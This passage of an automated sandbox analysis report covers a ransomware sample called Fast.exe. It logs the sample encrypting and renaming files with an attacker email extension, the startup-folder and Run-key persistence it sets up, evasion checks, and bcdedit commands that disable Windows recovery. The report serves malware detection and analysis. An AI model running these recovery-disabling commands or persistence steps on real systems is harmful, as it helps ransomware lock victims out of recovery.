Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9263-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\92bfb68adb54a6ec950196b4d39ccf3e.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9488-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9783-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9887-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9991-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9b1662bee64658ff8dd184737a056510.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\a56350ec5a5b310e9f4c7e10e0b6795c.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ab27b355502b23edc57dcc465635c3f5.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b961cde276c90015f1db51975a470747.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b99178ba996d2b4a255b0f163dcb88ce.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\bootstrap.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c124efa99176e538252a2ae3cef2137e.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c6534465ea418b6c252e2b74bc9e4bbb.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\db3460ac8568d0137d4556570169e475.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\dc3b5d449449a5103f90189b239c0bf6.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccx-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccxfeedback-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-editsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-enhance-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-extract-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-filepicker-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-help-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-readerRhp-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-RMUpsellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsfeedback-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsmanagerecipients-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rspresendreview-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-SignCrossSellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-signsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-split-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-unifiedShare-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-verbs-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-videoplayer-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: Fast.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vk_swiftshader.dll.pdb source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr
Source: Fast.exeStatic PE information: section name: .cdata
Source: Fast.exe.0.drStatic PE information: section name: .cdata
Source: Fast.exe.2.drStatic PE information: section name: .cdata
Source: Fast.exe0.2.drStatic PE information: section name: .cdata

Persistence and Installation Behavior

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\mraut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\micaut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\PhotoViewer.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\InkObj.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows NT\Accessories\wordpad.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.Entity.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender\MpSvc.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender\NisSrv.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\OPCTextExtractorWin.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0804.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ink\tabskb.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Media Player\setup_wm.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\ImagingEngine.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Photo Viewer\PhotoAcq.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0404.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\msix.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0011.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files (x86)\common files\Microsoft Shared\ink\mraut.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\RepoMan.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIntegration.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\mce.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRenamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exeJump to behavior
Uses bcdedit to modify the Windows boot settings
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Users\user\AppData\Local\Fast.exeJump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exeJump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeJump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the startup folder
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exeJump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeJump to dropped file
Source: C:\Users\user\Desktop\Fast.exeFile created: c:\programdata\microsoft\windows\start menu\programs\startup\Fast.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: c:\programdata\microsoft\windows\start menu\programs\startup\Fast.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\Fast.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FastJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FastJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FastJump to behavior
Source: C:\Users\user\Desktop\Fast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FastJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Creates files in the recycle bin to hide itself
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\desktop.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Creates files inside the volume driver (system volume information)
Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackupJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\vds.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Fast.exeEvasive API call chain: GetLocaleInfo, EnterCriticalSection, DeleteCriticalSectiongraph_14-3665
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeEvasive API call chain: GetLocaleInfo, EnterCriticalSection, DeleteCriticalSection
Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 6924Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 2440Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 2217Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 7769Jump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-4875
Source: C:\Users\user\Desktop\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-4729
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-3856
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-3898
Source: C:\Users\user\AppData\Local\Fast.exeAPI coverage: 4.6 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeAPI coverage: 4.6 %
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep count: 6924 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep time: -6924000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7792Thread sleep count: 64 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7792Thread sleep time: -64000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep count: 2440 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep time: -2440000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep count: 2217 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep time: -2217000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep count: 7769 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep time: -7769000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA5D61 FindFirstFileW,FindNextFileW,FindClose,2_2_00CA5D61
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D5D61 FindFirstFileW,FindNextFileW,FindClose,14_2_000D5D61
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00205D61 FindFirstFileW,FindNextFileW,FindClose,25_2_00205D61
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man{
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000*
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000d
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2246230697.0000023C6187A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man-
Source: bcdedit.exe, 00000012.00000002.2132924831.00000232A8F58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I VMware Virtual SATA CDROM Drive (0.0)
Source: Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.mans
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56KKqi
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.dll
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man9
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.manL
Source: bcdedit.exe, 00000014.00000002.2173147665.000001BB4003B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: vds.exe, 00000018.00000003.2251773165.0000023C6187A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Ph
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000*
Source: vds.exe, 00000018.00000003.2242855321.0000023C6187A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
